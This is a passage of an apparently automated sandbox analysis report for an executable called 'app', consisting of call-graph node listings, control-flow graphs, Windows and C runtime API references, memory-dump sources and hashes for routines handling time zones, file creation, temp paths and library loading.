16768->16772 16770 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16769->16770 16773 7ff7ace9e5c6 16770->16773 16774 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16771->16774 16777 7ff7ace9e63b 16772->16777 16775 7ff7ace9e61f 16774->16775 16776 7ff7acea4570 51 API calls 16776->16777 16777->16775 16777->16776 16779 7ff7ace9ca71 16778->16779 16780 7ff7ace949ae 16778->16780 16779->16780 16781 7ff7acea2354 45 API calls 16779->16781 16782 7ff7ace9cac8 16780->16782 16781->16780 16783 7ff7ace9caf0 16782->16783 16784 7ff7ace9cadd 16782->16784 16783->16659 16784->16783 16785 7ff7acea16c0 45 API calls 16784->16785 16785->16783 16792 7ff7ace9dd45 16786->16792 16793 7ff7ace9dd40 __vcrt_FlsAlloc 16786->16793 16787 7ff7ace9dd75 LoadLibraryExW 16789 7ff7ace9de4a 16787->16789 16790 7ff7ace9dd9a GetLastError 16787->16790 16788 7ff7ace9de6a GetProcAddress 16788->16792 16789->16788 16791 7ff7ace9de61 FreeLibrary 16789->16791 16790->16793 16791->16788 16792->16625 16793->16787 16793->16788 16793->16792 16794 7ff7ace9ddd4 LoadLibraryExW 16793->16794 16794->16789 16794->16793 16797 7ff7ace9e729 MultiByteToWideChar 16795->16797 16799 7ff7ace8f28d 16798->16799 16800 7ff7ace8f27d 16798->16800 16799->16613 16801 7ff7ace94374 _get_daylight 11 API calls 16800->16801 16802 7ff7ace8f282 16801->16802 16803 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16802->16803 16803->16799 16805 7ff7ace972c0 16804->16805 16806 7ff7ace972dc 16805->16806 16807 7ff7ace972fd 16805->16807 16825 7ff7ace86ffa 16824->16825 16826 7ff7ace990bd 16824->16826 16830 7ff7ace96e28 16825->16830 16827 7ff7ace94374 _get_daylight 11 API calls 16826->16827 16828 7ff7ace990c2 16827->16828 16829 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16828->16829 16829->16825 16831 7ff7ace96e31 16830->16831 16832 7ff7ace96e46 16830->16832 16833 7ff7ace94354 _fread_nolock 11 API calls 16831->16833 16834 7ff7ace94354 _fread_nolock 11 API calls 16832->16834 16839 7ff7ace96e3e 16832->16839 16835 7ff7ace96e36 16833->16835 16836 7ff7ace96e81 16834->16836 16837 7ff7ace94374 _get_daylight 11 API calls 16835->16837 16838 7ff7ace94374 _get_daylight 11 API calls 16836->16838 16837->16839 16840 7ff7ace96e89 16838->16840 16839->15112 16841 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16840->16841 16841->16839 16843 7ff7ace9532c 16842->16843 16844 7ff7ace95352 16843->16844 16846 7ff7ace95385 16843->16846 16845 7ff7ace94374 _get_daylight 11 API calls 16844->16845 16847 7ff7ace95357 16845->16847 16848 7ff7ace95398 16846->16848 16849 7ff7ace9538b 16846->16849 16850 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16847->16850 16861 7ff7ace9a028 16848->16861 16851 7ff7ace94374 _get_daylight 11 API calls 16849->16851 16860 7ff7ace83ce9 16850->16860 16851->16860 16860->15148 16874 7ff7ace9f6b8 EnterCriticalSection 16861->16874 17222 7ff7ace97898 17221->17222 17225 7ff7ace97374 17222->17225 17224 7ff7ace978b1 17224->15158 17226 7ff7ace9738f 17225->17226 17227 7ff7ace973be 17225->17227 17228 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 17226->17228 17235 7ff7ace9421c EnterCriticalSection 17227->17235 17230 7ff7ace973af 17228->17230 17230->17224 17237 7ff7ace8efd3 17236->17237 17239 7ff7ace8f001 17236->17239 17238 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 17237->17238 17240 7ff7ace8eff3 17238->17240 17239->17240 17246 7ff7ace9421c EnterCriticalSection 17239->17246 17240->15162 17248 7ff7ace812f8 17247->17248 17249 7ff7ace812c6 17247->17249 17250 7ff7ace8f864 73 API calls 17248->17250 17251 7ff7ace83c90 116 API calls 17249->17251 17252 7ff7ace8130a 17250->17252 17253 7ff7ace812d6 17251->17253 17255 7ff7ace8130e 17252->17255 17258 7ff7ace8132f 17252->17258 17253->17248 17254 7ff7ace812de 17253->17254 17256 7ff7ace82770 59 API calls 17254->17256 17257 7ff7ace824d0 59 API calls 17255->17257 17259 7ff7ace812ee 17256->17259 17260 7ff7ace81325 17257->17260 17261 7ff7ace81364 17258->17261 17262 7ff7ace81344 17258->17262 17259->15172 17260->15172 17263 7ff7ace8137e 17261->17263 17270 7ff7ace81395 17261->17270 17264 7ff7ace824d0 59 API calls 17262->17264 17265 7ff7ace81050 98 API calls 17263->17265 17269 7ff7ace8135f __std_exception_copy 17264->17269 17265->17269 17266 7ff7ace81421 17266->15172 17267 7ff7ace8f52c _fread_nolock 53 API calls 17267->17270 17268 7ff7ace8f1dc 74 API calls 17268->17266 17269->17266 17269->17268 17270->17267 17270->17269 17271 7ff7ace813de 17270->17271 17272 7ff7ace824d0 59 API calls 17271->17272 17272->17269 17274 7ff7ace81b30 49 API calls 17273->17274 17275 7ff7ace83d40 17274->17275 17275->15174 17277 7ff7ace816aa 17276->17277 17278 7ff7ace81666 17276->17278 17277->15183 17278->17277 17279 7ff7ace82770 59 API calls 17278->17279 17280 7ff7ace816be 17279->17280 17280->15183 17282 7ff7ace879a0 57 API calls 17281->17282 17283 7ff7ace87137 LoadLibraryExW 17282->17283 17284 7ff7ace87154 __std_exception_copy 17283->17284 17284->15199 17285->15275 17286->15273 17288 7ff7ace84950 17287->17288 17289 7ff7ace81b30 49 API calls 17288->17289 17290 7ff7ace84982 17289->17290 17291 7ff7ace849ab 17290->17291 17292 7ff7ace8498b 17290->17292 17294 7ff7ace84a02 17291->17294 17296 7ff7ace83d10 49 API calls 17291->17296 17293 7ff7ace82770 59 API calls 17292->17293 17295 7ff7ace849a1 17293->17295 17297 7ff7ace83d10 49 API calls 17294->17297 17302 7ff7ace8acd0 _wfindfirst32i64 8 API calls 17295->17302 17299 7ff7ace849cc 17296->17299 17298 7ff7ace84a1b 17297->17298 17300 7ff7ace84a39 17298->17300 17303 7ff7ace82770 59 API calls 17298->17303 17301 7ff7ace849ea 17299->17301 17305 7ff7ace82770 59 API calls 17299->17305 17304 7ff7ace87120 58 API calls 17300->17304 17372 7ff7ace83c20 17301->17372 17307 7ff7ace8309e 17302->17307 17303->17300 17308 7ff7ace84a46 17304->17308 17305->17301 17307->15284 17315 7ff7ace84cc0 17307->17315 17310 7ff7ace84a6d 17308->17310 17311 7ff7ace84a4b 17308->17311 17378 7ff7ace83dd0 GetProcAddress 17310->17378 17312 7ff7ace82620 57 API calls 17311->17312 17312->17295 17314 7ff7ace87120 58 API calls 17314->17294 17316 7ff7ace86970 61 API calls 17315->17316 17318 7ff7ace84cd5 17316->17318 17317 7ff7ace84cf0 17319 7ff7ace879a0 57 API calls 17317->17319 17318->17317 17320 7ff7ace82880 59 API calls 17318->17320 17321 7ff7ace84d34 17319->17321 17320->17317 17322 7ff7ace84d39 17321->17322 17323 7ff7ace84d50 17321->17323 17324 7ff7ace82770 59 API calls 17322->17324 17326 7ff7ace879a0 57 API calls 17323->17326 17325 7ff7ace84d45 17324->17325 17325->15286 17327 7ff7ace84d85 17326->17327 17329 7ff7ace81b30 49 API calls 17327->17329 17341 7ff7ace84d8a __std_exception_copy 17327->17341 17328 7ff7ace82770 59 API calls 17330 7ff7ace84f31 17328->17330 17331 7ff7ace84e07 17329->17331 17330->15286 17332 7ff7ace84e0e 17331->17332 17333 7ff7ace84e33 17331->17333 17334 7ff7ace82770 59 API calls 17332->17334 17335 7ff7ace879a0 57 API calls 17333->17335 17336 7ff7ace84e23 17334->17336 17337 7ff7ace84e4c 17335->17337 17336->15286 17337->17341 17485 7ff7ace84aa0 17337->17485 17341->17328 17342 7ff7ace84f1a 17341->17342 17342->15286 17344 7ff7ace846d7 17343->17344 17344->17344 17345 7ff7ace84700 17344->17345 17351 7ff7ace84717 __std_exception_copy 17344->17351 17346 7ff7ace82770 59 API calls 17345->17346 17347 7ff7ace8470c 17346->17347 17347->15288 17348 7ff7ace847fb 17348->15288 17349 7ff7ace812b0 122 API calls 17349->17351 17350 7ff7ace81780 59 API calls 17350->17351 17351->17348 17351->17349 17351->17350 17352 7ff7ace82770 59 API calls 17351->17352 17352->17351 17354 7ff7ace84927 17353->17354 17356 7ff7ace8483b 17353->17356 17354->15290 17355 7ff7ace81780 59 API calls 17355->17356 17356->17354 17356->17355 17356->17356 17357 7ff7ace82770 59 API calls 17356->17357 17357->17356 17373 7ff7ace83c2a 17372->17373 17374 7ff7ace879a0 57 API calls 17373->17374 17375 7ff7ace83c52 17374->17375 17376 7ff7ace8acd0 _wfindfirst32i64 8 API calls 17375->17376 17377 7ff7ace83c7a 17376->17377 17377->17294 17377->17314 17379 7ff7ace83e1b GetProcAddress 17378->17379 17380 7ff7ace83df8 17378->17380 17379->17380 17381 7ff7ace83e40 GetProcAddress 17379->17381 17382 7ff7ace82620 57 API calls 17380->17382 17381->17380 17383 7ff7ace83e65 GetProcAddress 17381->17383 17384 7ff7ace83e0b 17382->17384 17383->17380 17385 7ff7ace83e8d GetProcAddress 17383->17385 17384->17295 17385->17380 17386 7ff7ace83eb5 GetProcAddress 17385->17386 17386->17380 17387 7ff7ace83edd GetProcAddress 17386->17387 17388 7ff7ace83ef9 17387->17388 17389 7ff7ace83f05 GetProcAddress 17387->17389 17388->17389 17390 7ff7ace83f2d GetProcAddress 17389->17390 17391 7ff7ace83f21 17389->17391 17392 7ff7ace83f49 17390->17392 17391->17390 17393 7ff7ace83f5d GetProcAddress 17392->17393 17394 7ff7ace83f85 GetProcAddress 17392->17394 17393->17394 17397 7ff7ace83f79 17393->17397 17395 7ff7ace83fad GetProcAddress 17394->17395 17396 7ff7ace83fa1 17394->17396 17398 7ff7ace83fc9 17395->17398 17399 7ff7ace83fd5 GetProcAddress 17395->17399 17396->17395 17397->17394 17398->17399 17400 7ff7ace83ffd GetProcAddress 17399->17400 17401 7ff7ace83ff1 17399->17401 17402 7ff7ace84019 17400->17402 17403 7ff7ace84025 GetProcAddress 17400->17403 17401->17400 17402->17403 17404 7ff7ace8404d GetProcAddress 17403->17404 17405 7ff7ace84041 17403->17405 17406 7ff7ace84069 17404->17406 17407 7ff7ace84075 GetProcAddress 17404->17407 17405->17404 17406->17407 17408 7ff7ace8409d GetProcAddress 17407->17408 17409 7ff7ace84091 17407->17409 17410 7ff7ace840b9 17408->17410 17411 7ff7ace840c5 GetProcAddress 17408->17411 17409->17408 17410->17411 17493 7ff7ace84aba 17485->17493 17486 7ff7ace84c71 17487 7ff7ace8acd0 _wfindfirst32i64 8 API calls 17486->17487 17489 7ff7ace84c90 17487->17489 17488 7ff7ace81780 59 API calls 17488->17493 17512 7ff7ace87ba0 17489->17512 17490 7ff7ace84bd3 17490->17486 17492 7ff7ace990b4 _fread_nolock 37 API calls 17490->17492 17494 7ff7ace84bea 17492->17494 17493->17486 17493->17488 17493->17490 17495 7ff7ace84ca9 17493->17495 17519 7ff7ace95600 17493->17519 17523 7ff7ace9570c 17494->17523 17497 7ff7ace82770 59 API calls 17495->17497 17497->17486 17514 7ff7ace87bbf 17512->17514 17520 7ff7ace95630 17519->17520 17548 7ff7ace95404 17520->17548 17529 7ff7ace95735 17523->17529 17549 7ff7ace95437 17548->17549 17550 7ff7ace95479 17549->17550 17551 7ff7ace9544c 17549->17551 17560 7ff7ace9543c 17549->17560 17560->17560 17653 7ff7ace9a550 __GetCurrentState 45 API calls 17652->17653 17654 7ff7ace99011 17653->17654 17655 7ff7ace9913c __GetCurrentState 45 API calls 17654->17655 17656 7ff7ace99031 17655->17656 19272 7ff7acea0720 19283 7ff7acea6694 19272->19283 19284 7ff7acea66a1 19283->19284 19285 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19284->19285 19286 7ff7acea66bd 19284->19286 19285->19284 19287 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19286->19287 19288 7ff7acea0729 19286->19288 19287->19286 19289 7ff7ace9f6b8 EnterCriticalSection 19288->19289 19290 7ff7ace9b920 19301 7ff7ace9f6b8 EnterCriticalSection 19290->19301 14652 7ff7ace89620 14653 7ff7ace8964e 14652->14653 14654 7ff7ace89635 14652->14654 14654->14653 14657 7ff7ace9c9fc 14654->14657 14658 7ff7ace9ca47 14657->14658 14662 7ff7ace9ca0b _get_daylight 14657->14662 14667 7ff7ace94374 14658->14667 14659 7ff7ace9ca2e HeapAlloc 14661 7ff7ace896ac 14659->14661 14659->14662 14662->14658 14662->14659 14664 7ff7acea25e0 14662->14664 14670 7ff7acea2620 14664->14670 14676 7ff7ace9a6c8 GetLastError 14667->14676 14669 7ff7ace9437d 14669->14661 14675 7ff7ace9f6b8 EnterCriticalSection 14670->14675 14677 7ff7ace9a709 FlsSetValue 14676->14677 14679 7ff7ace9a6ec 14676->14679 14678 7ff7ace9a71b 14677->14678 14691 7ff7ace9a6f9 SetLastError 14677->14691 14693 7ff7ace9dc70 14678->14693 14679->14677 14679->14691 14683 7ff7ace9a748 FlsSetValue 14686 7ff7ace9a754 FlsSetValue 14683->14686 14687 7ff7ace9a766 14683->14687 14684 7ff7ace9a738 FlsSetValue 14685 7ff7ace9a741 14684->14685 14700 7ff7ace99d48 14685->14700 14686->14685 14706 7ff7ace9a2f4 14687->14706 14691->14669 14694 7ff7ace9dc81 _get_daylight 14693->14694 14695 7ff7ace9dcd2 14694->14695 14696 7ff7ace9dcb6 HeapAlloc 14694->14696 14699 7ff7acea25e0 _get_daylight 2 API calls 14694->14699 14697 7ff7ace94374 _get_daylight 10 API calls 14695->14697 14696->14694 14698 7ff7ace9a72a 14696->14698 14697->14698 14698->14683 14698->14684 14699->14694 14701 7ff7ace99d7c 14700->14701 14702 7ff7ace99d4d RtlFreeHeap 14700->14702 14701->14691 14702->14701 14703 7ff7ace99d68 GetLastError 14702->14703 14704 7ff7ace99d75 Concurrency::details::SchedulerProxy::DeleteThis 14703->14704 14705 7ff7ace94374 _get_daylight 9 API calls 14704->14705 14705->14701 14711 7ff7ace9a1cc 14706->14711 14723 7ff7ace9f6b8 EnterCriticalSection 14711->14723 19310 7ff7acea9617 19311 7ff7acea9630 19310->19311 19312 7ff7acea9626 19310->19312 19314 7ff7ace9f718 LeaveCriticalSection 19312->19314

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00007FF7ACEA4D50 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 135 7ff7acea4d50-7ff7acea4d8b call 7ff7acea46d8 call 7ff7acea46e0 call 7ff7acea4748 142 7ff7acea4d91-7ff7acea4d9c call 7ff7acea46e8 135->142 143 7ff7acea4fb5-7ff7acea5001 call 7ff7ace99d00 call 7ff7acea46d8 call 7ff7acea46e0 call 7ff7acea4748 135->143 142->143 148 7ff7acea4da2-7ff7acea4dac 142->148 169 7ff7acea513f-7ff7acea51ad call 7ff7ace99d00 call 7ff7acea05e8 143->169 170 7ff7acea5007-7ff7acea5012 call 7ff7acea46e8 143->170 150 7ff7acea4dce-7ff7acea4dd2 148->150 151 7ff7acea4dae-7ff7acea4db1 148->151 154 7ff7acea4dd5-7ff7acea4ddd 150->154 153 7ff7acea4db4-7ff7acea4dbf 151->153 156 7ff7acea4dc1-7ff7acea4dc8 153->156 157 7ff7acea4dca-7ff7acea4dcc 153->157 154->154 158 7ff7acea4ddf-7ff7acea4df2 call 7ff7ace9c9fc 154->158 156->153 156->157 157->150 160 7ff7acea4dfb-7ff7acea4e09 157->160 166 7ff7acea4df4-7ff7acea4df6 call 7ff7ace99d48 158->166 167 7ff7acea4e0a-7ff7acea4e16 call 7ff7ace99d48 158->167 166->160 176 7ff7acea4e1d-7ff7acea4e25 167->176 189 7ff7acea51af-7ff7acea51b6 169->189 190 7ff7acea51bb-7ff7acea51be 169->190 170->169 178 7ff7acea5018-7ff7acea5023 call 7ff7acea4718 170->178 176->176 179 7ff7acea4e27-7ff7acea4e38 call 7ff7ace9f854 176->179 178->169 187 7ff7acea5029-7ff7acea504c call 7ff7ace99d48 GetTimeZoneInformation 178->187 179->143 188 7ff7acea4e3e-7ff7acea4e94 call 7ff7ace8c150 * 4 call 7ff7acea4c6c 179->188 203 7ff7acea5052-7ff7acea5073 187->203 204 7ff7acea5114-7ff7acea513e call 7ff7acea46d0 call 7ff7acea46c0 call 7ff7acea46c8 187->204 247 7ff7acea4e96-7ff7acea4e9a 188->247 195 7ff7acea524b-7ff7acea524e 189->195 192 7ff7acea51c0 190->192 193 7ff7acea51f5-7ff7acea5208 call 7ff7ace9c9fc 190->193 197 7ff7acea51c3 192->197 208 7ff7acea5213-7ff7acea522e call 7ff7acea05e8 193->208 209 7ff7acea520a 193->209 196 7ff7acea5254-7ff7acea525c call 7ff7acea4d50 195->196 195->197 205 7ff7acea51c8-7ff7acea51f4 call 7ff7ace99d48 call 7ff7ace8acd0 196->205 197->205 206 7ff7acea51c3 call 7ff7acea4fcc 197->206 211 7ff7acea5075-7ff7acea507b 203->211 212 7ff7acea507e-7ff7acea5085 203->212 206->205 235 7ff7acea5230-7ff7acea5233 208->235 236 7ff7acea5235-7ff7acea5247 call 7ff7ace99d48 208->236 217 7ff7acea520c-7ff7acea5211 call 7ff7ace99d48 209->217 211->212 219 7ff7acea5087-7ff7acea508f 212->219 220 7ff7acea5099 212->220 217->192 219->220 227 7ff7acea5091-7ff7acea5097 219->227 223 7ff7acea509b-7ff7acea510f call 7ff7ace8c150 * 4 call 7ff7acea1bac call 7ff7acea5264 * 2 220->223 223->204 227->223 235->217 236->195 249 7ff7acea4ea0-7ff7acea4ea4 247->249 250 7ff7acea4e9c 247->250 249->247 252 7ff7acea4ea6-7ff7acea4ecb call 7ff7acea7b94 249->252 250->249 258 7ff7acea4ece-7ff7acea4ed2 252->258 260 7ff7acea4ee1-7ff7acea4ee5 258->260 261 7ff7acea4ed4-7ff7acea4edf 258->261 260->258 261->260 263 7ff7acea4ee7-7ff7acea4eeb 261->263 266 7ff7acea4f6c-7ff7acea4f70 263->266 267 7ff7acea4eed-7ff7acea4f15 call 7ff7acea7b94 263->267 268 7ff7acea4f72-7ff7acea4f74 266->268 269 7ff7acea4f77-7ff7acea4f84 266->269 274 7ff7acea4f33-7ff7acea4f37 267->274 275 7ff7acea4f17 267->275 268->269 272 7ff7acea4f9f-7ff7acea4fae call 7ff7acea46d0 call 7ff7acea46c0 269->272 273 7ff7acea4f86-7ff7acea4f9c call 7ff7acea4c6c 269->273 272->143 273->272 274->266 281 7ff7acea4f39-7ff7acea4f57 call 7ff7acea7b94 274->281 279 7ff7acea4f1a-7ff7acea4f21 275->279 279->274 282 7ff7acea4f23-7ff7acea4f31 279->282 287 7ff7acea4f63-7ff7acea4f6a 281->287 282->274 282->279 287->266 288 7ff7acea4f59-7ff7acea4f5d 287->288 288->266 289 7ff7acea4f5f 288->289 289->287
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA4D95
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA46E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA46FC
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: RtlFreeHeap.NTDLL(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D00: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7ACE99CDF,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE99D09
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D00: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7ACE99CDF,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE99D2E
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA4D84
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA4748: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA475C
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA4FFA
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA500B
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA501C
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7ACEA525C), ref: 00007FF7ACEA5043
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                            • API String ID: 4070488512-239921721
                                                                                                                                                                                                            • Opcode ID: 3cbab8ded4b22c9ecff02dc7d03bcb7a7c6bdc9119315e29a6b66e941e77c5ab
                                                                                                                                                                                                            • Instruction ID: cc3d5d07ba566296964640fa477d9531a66c568089070c5d1f02e8e399f8538d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3cbab8ded4b22c9ecff02dc7d03bcb7a7c6bdc9119315e29a6b66e941e77c5ab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BD1F576A0E642AAEB20FF21D4811B9E791FF84785FCA9035EA0D576A5DF3CE441C360
                                                                                                                                                                                                            Function 00007FF7ACEA5C9C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 320 7ff7acea5c9c-7ff7acea5d0f call 7ff7acea59d0 323 7ff7acea5d11-7ff7acea5d1a call 7ff7ace94354 320->323 324 7ff7acea5d29-7ff7acea5d33 call 7ff7ace96c2c 320->324 329 7ff7acea5d1d-7ff7acea5d24 call 7ff7ace94374 323->329 330 7ff7acea5d35-7ff7acea5d4c call 7ff7ace94354 call 7ff7ace94374 324->330 331 7ff7acea5d4e-7ff7acea5db7 CreateFileW 324->331 343 7ff7acea606a-7ff7acea608a 329->343 330->329 334 7ff7acea5e34-7ff7acea5e3f GetFileType 331->334 335 7ff7acea5db9-7ff7acea5dbf 331->335 337 7ff7acea5e92-7ff7acea5e99 334->337 338 7ff7acea5e41-7ff7acea5e7c GetLastError call 7ff7ace942e8 CloseHandle 334->338 340 7ff7acea5e01-7ff7acea5e2f GetLastError call 7ff7ace942e8 335->340 341 7ff7acea5dc1-7ff7acea5dc5 335->341 346 7ff7acea5ea1-7ff7acea5ea4 337->346 347 7ff7acea5e9b-7ff7acea5e9f 337->347 338->329 354 7ff7acea5e82-7ff7acea5e8d call 7ff7ace94374 338->354 340->329 341->340 348 7ff7acea5dc7-7ff7acea5dff CreateFileW 341->348 352 7ff7acea5eaa-7ff7acea5eff call 7ff7ace96b44 346->352 353 7ff7acea5ea6 346->353 347->352 348->334 348->340 358 7ff7acea5f01-7ff7acea5f0d call 7ff7acea5bd8 352->358 359 7ff7acea5f1e-7ff7acea5f4f call 7ff7acea5750 352->359 353->352 354->329 358->359 365 7ff7acea5f0f 358->365 366 7ff7acea5f51-7ff7acea5f53 359->366 367 7ff7acea5f55-7ff7acea5f97 359->367 368 7ff7acea5f11-7ff7acea5f19 call 7ff7ace99ec0 365->368 366->368 369 7ff7acea5fb9-7ff7acea5fc4 367->369 370 7ff7acea5f99-7ff7acea5f9d 367->370 368->343 373 7ff7acea6068 369->373 374 7ff7acea5fca-7ff7acea5fce 369->374 370->369 372 7ff7acea5f9f-7ff7acea5fb4 370->372 372->369 373->343 374->373 375 7ff7acea5fd4-7ff7acea6019 CloseHandle CreateFileW 374->375 377 7ff7acea601b-7ff7acea6049 GetLastError call 7ff7ace942e8 call 7ff7ace96d6c 375->377 378 7ff7acea604e-7ff7acea6063 375->378 377->378 378->373
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                                            • Opcode ID: 632e748b839932f5b00ec5f176d5a067dee1d4c4f3157cbf34afbb6f699b0397
                                                                                                                                                                                                            • Instruction ID: aa2eed03ff51c4924e06a66f0e0230fac6009a17ca9d9430a36da21129a4c5d1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 632e748b839932f5b00ec5f176d5a067dee1d4c4f3157cbf34afbb6f699b0397
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3C1E276B2EA4199EB10EF65C4802BD7761FB49B98B864235DF2E673A4CF38D055C310
                                                                                                                                                                                                            Function 00007FF7ACE86760 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTempPathW.KERNEL32(?,00000000,?,00007FF7ACE8672D), ref: 00007FF7ACE867FA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: GetEnvironmentVariableW.KERNEL32(00007FF7ACE836C7), ref: 00007FF7ACE869AA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7ACE869C7
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE965E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACE965FD
                                                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF7ACE868B1
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82770: MessageBoxW.USER32 ref: 00007FF7ACE82841
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
